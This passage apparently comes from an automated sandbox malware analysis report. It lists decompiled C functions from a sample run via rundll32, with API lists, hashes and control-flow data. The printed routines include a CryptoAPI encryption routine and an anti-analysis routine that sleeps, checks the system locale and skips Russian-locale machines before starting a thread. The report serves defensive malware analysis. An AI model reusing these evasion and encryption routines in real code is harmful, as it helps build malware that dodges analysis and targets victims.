				signed int _t10;
				void* _t13;

				_t9 = __esi;
				_t8 = __edi;
				_t5 = __ebx;
				_t1 = __eax;
				while(1) {
					 *0x48e7a8 = _t5;
					 *0x48e7a0 = _t9;
					 *0x48e7a4 = _t8;
					_t13 =  *0x48e7a4 - _t8; // 0x401023
					if(_t13 != 0) {
						break;
					}
					 *0x48e7b0 =  *0x48e7b0 ^ _t10;
					_pop(_t2);
					 *0x48e7ac = _t2;
					 *0x48e7b0 =  *0x48e7b0 + 4;
					_t3 =  *0x48e8d0; // 0x4024f3
					_t1 =  *((intOrPtr*)(_t3 - 0x1183))(0); // executed
				}
				 *_t10 = _t1;
				_push(_t10);
				return _t1;
			}











                0x00401511
                0x00401511
                0x00401511
                0x00401511
                0x0040153b
                0x0040153d
                0x00401545
                0x0040154b
                0x00401551
                0x00401557
                0x00000000
                0x00000000
                0x00401516
                0x0040151c
                0x0040151d
                0x00401522
                0x0040152c
                0x00401539
                0x00401539
                0x00401559
                0x00401560
                0x00401564

                Memory Dump Source
                • Source File: 00000000.00000002.272718233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.272711295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.0000000000408000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.000000000040F000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.0000000000412000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272862074.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272917442.000000000048B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272922546.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272926685.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272930095.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 36ba1fc2da769d0e2280fcc6d6fe17dfe378582dc41a395bc31841d3a15e0ab0
                • Instruction ID: 2e2a760b58fa734c707d093a5a678682179c551fac989b5bd1e1fe51690c4961
                • Opcode Fuzzy Hash: 36ba1fc2da769d0e2280fcc6d6fe17dfe378582dc41a395bc31841d3a15e0ab0
                • Instruction Fuzzy Hash: 8BE0C2B4A08344AFD7049F9ABC1026EB7E8F386700F445A3E95099B2A0E77594819B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401510 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 26 401510 27 401511-401514 26->27 28 40153b-401557 27->28 29 401516-401534 28->29 30 401559-401564 28->30 29->28 31 401539 call 401370 29->31 31->28
                C-Code - Quality: 88%
                			E00401510(void* __eax, intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t2;
				intOrPtr _t3;
				intOrPtr _t4;
				intOrPtr _t6;
				intOrPtr _t9;
				intOrPtr _t10;
				signed int _t12;
				signed int _t15;
				void* _t17;

				_t10 = __esi;
				_t9 = __edi;
				_t6 = __ebx;
				_t2 = __eax + 1;
				_t12 = _t15;
				while(1) {
					 *0x48e7a8 = _t6;
					 *0x48e7a0 = _t10;
					 *0x48e7a4 = _t9;
					_t17 =  *0x48e7a4 - _t9; // 0x401023
					if(_t17 != 0) {
						break;
					}
					 *0x48e7b0 =  *0x48e7b0 ^ _t12;
					_pop(_t3);
					 *0x48e7ac = _t3;
					 *0x48e7b0 =  *0x48e7b0 + 4;
					_t4 =  *0x48e8d0; // 0x4024f3
					_t2 =  *((intOrPtr*)(_t4 - 0x1183))(0); // executed
				}
				 *_t12 = _t2;
				_push(_t12);
				return _t2;
			}












                0x00401510
                0x00401510
                0x00401510
                0x00401510
                0x00401512
                0x0040153b
                0x0040153d
                0x00401545
                0x0040154b
                0x00401551
                0x00401557
                0x00000000
                0x00000000
                0x00401516
                0x0040151c
                0x0040151d
                0x00401522
                0x0040152c
                0x00401539
                0x00401539
                0x00401559
                0x00401560
                0x00401564

                Memory Dump Source
                • Source File: 00000000.00000002.272718233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.272711295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.0000000000408000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.000000000040F000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.0000000000412000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272862074.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272917442.000000000048B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272922546.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272926685.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272930095.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 81abe696749345d118b84c669248143c103ea277145b9ebafeaa61ed6eeaacf1
                • Instruction ID: f906e20ab82b5ed7b070e35a117f83c689c3cc086cf9b28f8604d52bb5c8dc3a
                • Opcode Fuzzy Hash: 81abe696749345d118b84c669248143c103ea277145b9ebafeaa61ed6eeaacf1
                • Instruction Fuzzy Hash: DED09E78908708AF97158F4A7D4003AB7F9F686700B94293FA40A9B360E7719881A74D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401370 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 401370-4013d0 call 401740 * 3 7 4013d2-40141b 0->7 8 401443-40144b 0->8 10 401421 7->10 11 4014f6-401508 7->11 12 4014c7-4014eb GetBinaryTypeW 10->12 13 401426-401438 11->13 14 40150e 11->14 15 4014f1 12->15 17 40144c-4014c5 call 4010a0 memset ReadPwrScheme 12->17 13->15 16 40143e 13->16 14->12 15->8 16->12 17->15
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.272718233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.272711295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.0000000000408000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.000000000040F000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272718233.0000000000412000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272862074.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272917442.000000000048B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272922546.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272926685.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.272930095.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                Similarity
                • API ID: BinaryReadSchemeTypememset
                • String ID:
                • API String ID: 3942391067-0
                • Opcode ID: 22b2b1adae6d8a581a5f2027df6d90117b2150713a6324f1de15750c2bef46a1
                • Instruction ID: c8fa2d138a66364d72711ac360665275a51d0ccfd93b427d6f255f79c7e3c33c
                • Opcode Fuzzy Hash: 22b2b1adae6d8a581a5f2027df6d90117b2150713a6324f1de15750c2bef46a1
                • Instruction Fuzzy Hash: 4341BB746147008FC324EF39C541262BBE1AF49714F504A7EE48A9BBE1D73AF805CB8A
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                Function 04B96EB4 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163encryptionCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 50%
                			E04B96EB4(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x4b9a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x4b9a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04B96601(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x4b9a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x4b9a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E04B94130(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                0x04b96ebd
                0x04b96ec3
                0x04b96ec6
                0x04b96ecc
                0x04b96ecc
                0x04b96ece
                0x04b96ed0
                0x04b96ed3
                0x04b96ed9
                0x04b96eda
                0x04b96edb
                0x04b96ee1
                0x04b96ee6
                0x04b96eec
                0x04b96ef4
                0x04b97051
                0x04b96efa
                0x04b96efc
                0x04b96f05
                0x04b96f0a
                0x04b96f1c
                0x04b96f1f
                0x04b96f23
                0x04b96f2a
                0x04b96f2e
                0x04b96f36
                0x04b9703c
                0x04b96f3c
                0x04b96f3c
                0x04b96f40
                0x04b96f41
                0x04b96f43
                0x04b96f4e
                0x04b97028
                0x04b96f54
                0x04b96f54
                0x04b96f57
                0x04b96f5d
                0x04b96f63
                0x04b96f63
                0x04b96f6b
                0x04b96f6d
                0x04b96f72
                0x04b97019
                0x04b96f78
                0x04b96f7e
                0x04b96f81
                0x04b96f84
                0x04b96f86
                0x04b96f87
                0x04b96f8c
                0x04b96f8e
                0x04b96f8e
                0x04b96f98
                0x04b96f9d
                0x04b96fa0
                0x04b96fa3
                0x04b96fa5
                0x04b96fae
                0x04b96fd8
                0x04b96fb0
                0x04b96fc1
                0x04b96fc1
                0x04b96fe0
                0x00000000
                0x00000000
                0x04b96fe2
                0x04b96fe5
                0x04b96fe8
                0x04b96fec
                0x00000000
                0x04b96fee
                0x04b96ffd
                0x04b97003
                0x04b9700b
                0x04b9700b
                0x00000000
                0x04b96fec
                0x04b96ff0
                0x04b96ff6
                0x04b96ffb
                0x04b97012
                0x00000000
                0x00000000
                0x00000000
                0x04b96ffb
                0x04b96f72
                0x04b9702b
                0x04b9702e
                0x04b9702e
                0x04b97043
                0x04b97043
                0x04b9705b

                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04B95335,00000001,04B96DDD,00000000), ref: 04B96EEC
                • memcpy.NTDLL(04B95335,04B96DDD,00000010,?,?,?,04B95335,00000001,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740), ref: 04B96F05
                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04B96F2E
                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04B96F46
                • memcpy.NTDLL(00000000,76B5C740,05109600,00000010), ref: 04B96F98
                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05109600,00000020,?,?,00000010), ref: 04B96FC1
                • GetLastError.KERNEL32(?,?,00000010), ref: 04B96FF0
                • GetLastError.KERNEL32 ref: 04B97022
                • CryptDestroyKey.ADVAPI32(00000000), ref: 04B9702E
                • GetLastError.KERNEL32 ref: 04B97036
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B97043
                • GetLastError.KERNEL32(?,?,?,04B95335,00000001,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B9704B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                • String ID: @MetNet
                • API String ID: 3401600162-2109406137
                • Opcode ID: 766dfb1c513a3721262bd5f2504cb56a6e558b8c018baadb0dd0beb2723f7bd5
                • Instruction ID: b93374accf56e10c3740f8c54ffd84545f48a49dbf224f2f04374cd6a59dfa48
                • Opcode Fuzzy Hash: 766dfb1c513a3721262bd5f2504cb56a6e558b8c018baadb0dd0beb2723f7bd5
                • Instruction Fuzzy Hash: 21513BB1900248FFDF109FB5D984AAE7BF9EB08340F10847AF915E7240EB35AE149B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401C21 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139sleepnativesynchronizationCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 135 401c21-401c31 call 401ba8 138 401c37-401c39 135->138 139 401d9e-401d9f 135->139 140 401c3a-401c41 138->140 141 401c42-401c4c call 401634 140->141 144 401c83 141->144 145 401c4e-401c69 NtQuerySystemInformation 141->145 146 401c8a-401c8e 144->146 147 401c6b 145->147 148 401c6e-401c81 call 401b8c 145->148 146->141 149 401c90-401ca9 call 401664 Sleep 146->149 147->148 148->146 149->140 154 401cab-401caf 149->154 155 401cb5-401ccd GetLocaleInfoA 154->155 156 401d9b-401d9d 154->156 157 401ce7-401cf0 155->157 158 401ccf-401ce2 GetSystemDefaultUILanguage VerLanguageNameA 155->158 156->139 159 401cf6-401cf9 157->159 160 401d8d-401d93 157->160 158->157 162 401d4a-401d5e call 401234 159->162 163 401cfb-401d06 call 401da8 159->163 160->156 161 401d95 160->161 161->156 168 401d60-401d6e WaitForSingleObject 162->168 169 401d84-401d8a 162->169 170 401d44 163->170 171 401d08-401d1a GetLongPathNameW 163->171 172 401d70-401d74 168->172 173 401d7b-401d82 CloseHandle 168->173 169->160 170->162 174 401d3c-401d42 171->174 175 401d1c-401d2d call 401634 171->175 172->173 173->160 174->162 175->174 179 401d2f-401d35 GetLongPathNameW call 401b8c 175->179 181 401d3a 179->181 181->162
                C-Code - Quality: 79%
                			E00401C21(char _a4) {
				long _v8;
				char _v12;
				char _v36;
				long _t29;
				long _t31;
				long _t32;
				signed short _t34;
				long _t39;
				void* _t45;
				intOrPtr _t47;
				signed int _t54;
				signed int _t55;
				long _t60;
				intOrPtr _t62;
				void* _t67;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t76;
				intOrPtr* _t77;

				_t29 = E00401BA8();
				_v8 = _t29;
				if(_t29 != 0) {
					return _t29;
				} else {
					do {
						_t71 = 0;
						_v12 = 0;
						_t60 = 0x30;
						do {
							_t67 = E00401634(_t60);
							if(_t67 == 0) {
								_v8 = 8;
							} else {
								_t54 = NtQuerySystemInformation(8, _t67, _t60,  &_v12); // executed
								_t63 = _t54;
								_t55 = _t54 & 0x0000ffff;
								_v8 = _t55;
								if(_t55 == 4) {
									_t60 = _t60 + 0x30;
								}
								_t72 = 0x13;
								_t10 = _t63 + 1; // 0x1
								_t71 =  *_t67 % _t72 + _t10;
								E00401B8C(_t67);
							}
						} while (_v8 != 0);
						_t31 = E00401664(_t71); // executed
						_v8 = _t31;
						Sleep(_t71 << 4); // executed
						_t32 = _v8;
					} while (_t32 == 0x15);
					if(_t32 != 0) {
						L28:
						return _t32;
					}
					_v12 = 0;
					_t34 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4);
					if(_t34 == 0) {
						__imp__GetSystemDefaultUILanguage();
						_t63 =  &_v12;
						VerLanguageNameA(_t34 & 0xffff,  &_v12, 4);
					}
					if(_v12 == 0x5552) {
						L26:
						_t32 = _v8;
						if(_t32 == 0xffffffff) {
							_t32 = GetLastError();
						}
						goto L28;
					} else {
						if(_a4 != 0) {
							L21:
							_push(0);
							_t76 = E00401234(E00401490,  &_v36);
							if(_t76 == 0) {
								_v8 = GetLastError();
							} else {
								_t39 = WaitForSingleObject(_t76, 0xffffffff);
								_v8 = _t39;
								if(_t39 == 0) {
									GetExitCodeThread(_t76,  &_v8);
								}
								CloseHandle(_t76);
							}
							goto L26;
						}
						if(E00401DA8(_t63,  &_a4) != 0) {
							 *0x4041b8 = 0;
							goto L21;
						}
						_t62 = _a4;
						_t77 = __imp__GetLongPathNameW;
						_t45 =  *_t77(_t62, 0, 0); // executed
						_t69 = _t45;
						if(_t69 == 0) {
							L19:
							 *0x4041b8 = _t62;
							goto L21;
						}
						_t23 = _t69 + 2; // 0x2
						_t47 = E00401634(_t69 + _t23);
						 *0x4041b8 = _t47;
						if(_t47 == 0) {
							goto L19;
						}
						 *_t77(_t62, _t47, _t69); // executed
						E00401B8C(_t62);
						goto L21;
					}
				}
			}























                0x00401c27
                0x00401c2c
                0x00401c31
                0x00401d9f
                0x00401c37
                0x00401c3a
                0x00401c3a
                0x00401c3e
                0x00401c41
                0x00401c42
                0x00401c48
                0x00401c4c
                0x00401c83
                0x00401c4e
                0x00401c56
                0x00401c5c
                0x00401c5e
                0x00401c63
                0x00401c69
                0x00401c6b
                0x00401c6b
                0x00401c72
                0x00401c78
                0x00401c78
                0x00401c7c
                0x00401c7c
                0x00401c8a
                0x00401c91
                0x00401c9a
                0x00401c9d
                0x00401ca3
                0x00401ca6
                0x00401caf
                0x00401d9b
                0x00000000
                0x00401d9d
                0x00401cc2
                0x00401cc5
                0x00401ccd
                0x00401ccf
                0x00401cda
                0x00401ce2
                0x00401ce2
                0x00401cf0
                0x00401d8d
                0x00401d8d
                0x00401d93
                0x00401d95
                0x00401d95
                0x00000000
                0x00401cf6
                0x00401cf9
                0x00401d4a
                0x00401d4a
                0x00401d5a
                0x00401d5e
                0x00401d8a
                0x00401d60
                0x00401d63
                0x00401d69
                0x00401d6e
                0x00401d75
                0x00401d75
                0x00401d7c
                0x00401d7c
                0x00000000
                0x00401d5e
                0x00401d06
                0x00401d44
                0x00000000
                0x00401d44
                0x00401d08
                0x00401d0d
                0x00401d14
                0x00401d16
                0x00401d1a
                0x00401d3c
                0x00401d3c
                0x00000000
                0x00401d3c
                0x00401d1c
                0x00401d21
                0x00401d26
                0x00401d2d
                0x00000000
                0x00000000
                0x00401d32
                0x00401d35
                0x00000000
                0x00401d35
                0x00401cf0

                APIs
                  • Part of subcall function 00401BA8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401C2C), ref: 00401BB7
                  • Part of subcall function 00401BA8: GetVersion.KERNEL32 ref: 00401BC6
                  • Part of subcall function 00401BA8: GetCurrentProcessId.KERNEL32 ref: 00401BE2
                  • Part of subcall function 00401BA8: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401BFB
                  • Part of subcall function 00401634: RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                • NtQuerySystemInformation.NTDLL ref: 00401C56
                • Sleep.KERNEL32(00000000,00000000,00000030,746563F0,00000000), ref: 00401C9D
                • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00401CC5
                • GetSystemDefaultUILanguage.KERNEL32 ref: 00401CCF
                • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00401CE2
                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401D14
                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401D32
                • WaitForSingleObject.KERNEL32(00000000,000000FF,00401490,?,00000000), ref: 00401D63
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00401D75
                • CloseHandle.KERNEL32(00000000), ref: 00401D7C
                • GetLastError.KERNEL32(00401490,?,00000000), ref: 00401D84
                • GetLastError.KERNEL32 ref: 00401D95
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Name$ErrorLanguageLastLongPathProcessSystem$AllocateCloseCodeCreateCurrentDefaultEventExitHandleHeapInfoInformationLocaleObjectOpenQuerySingleSleepThreadVersionWait
                • String ID: @Met`fet MetTet
                • API String ID: 1327471650-3757152079
                • Opcode ID: 36466854d33b217da6cd5bd188e5b16339452aaccaa8ef990bfbf19b79c1f6e2
                • Instruction ID: 2abc78f70f70839a745b78694b816f7735236303e9feb03562aba52f8e45a471
                • Opcode Fuzzy Hash: 36466854d33b217da6cd5bd188e5b16339452aaccaa8ef990bfbf19b79c1f6e2
                • Instruction Fuzzy Hash: 0641D471901615ABEB20EFA59D44AAF7ABCAF44755F104137F901F72E0DB38DE408BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402133 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 227 402133-40218a _aulldiv _snwprintf 229 402191-4021aa 227->229 230 40218c 227->230 232 4021f4-4021fa 229->232 233 4021ac-4021b5 229->233 230->229 241 4021fc-402202 232->241 234 4021c5-4021d3 MapViewOfFile 233->234 235 4021b7-4021be GetLastError 233->235 237 4021e3-4021e9 GetLastError 234->237 238 4021d5-4021e1 234->238 235->234 236 4021c0-4021c3 235->236 240 4021eb-4021f2 CloseHandle 236->240 237->240 237->241 238->241 240->241
                C-Code - Quality: 69%
                			E00402133(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L004022F0();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x4041c4;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L004022EA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x4041c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                0x00402133
                0x0040213c
                0x00402140
                0x00402146
                0x0040214b
                0x00402150
                0x00402153
                0x00402156
                0x0040215b
                0x0040215c
                0x0040215f
                0x0040216a
                0x00402171
                0x00402175
                0x00402177
                0x00402178
                0x0040217b
                0x00402180
                0x0040218a
                0x0040218c
                0x0040218c
                0x004021a0
                0x004021a6
                0x004021aa
                0x004021fa
                0x004021ac
                0x004021b5
                0x004021cb
                0x004021d3
                0x004021e5
                0x004021e9
                0x00000000
                0x00000000
                0x004021d5
                0x004021d8
                0x004021dd
                0x004021df
                0x004021df
                0x004021c0
                0x004021c2
                0x004021eb
                0x004021ec
                0x004021ec
                0x004021b5
                0x00402202

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401509,0000000A,?,?), ref: 00402140
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00402156
                • _snwprintf.NTDLL ref: 0040217B
                • CreateFileMappingW.KERNELBASE(000000FF,004041C8,00000004,00000000,?,?), ref: 004021A0
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A,?), ref: 004021B7
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 004021CB
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A,?), ref: 004021E3
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A), ref: 004021EC
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A,?), ref: 004021F4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID: @Met`fet MetTet$`RetAet
                • API String ID: 1724014008-3439188715
                • Opcode ID: ed53cc6cf733dc674b0c403c12d91a41e15459a6f2733fc71b17f5c4fe798c95
                • Instruction ID: a4855123c4efb33c13c183e8f99f0a059a3d0a3c88084186435778c1e7682e09
                • Opcode Fuzzy Hash: ed53cc6cf733dc674b0c403c12d91a41e15459a6f2733fc71b17f5c4fe798c95
                • Instruction Fuzzy Hash: 7A2192B2500108BBDB10EFA4CD88EAF3BADEB48355F104176F715FA2D0D6B49A459B68
                Uniqueness

                Uniqueness Score: -1.00%

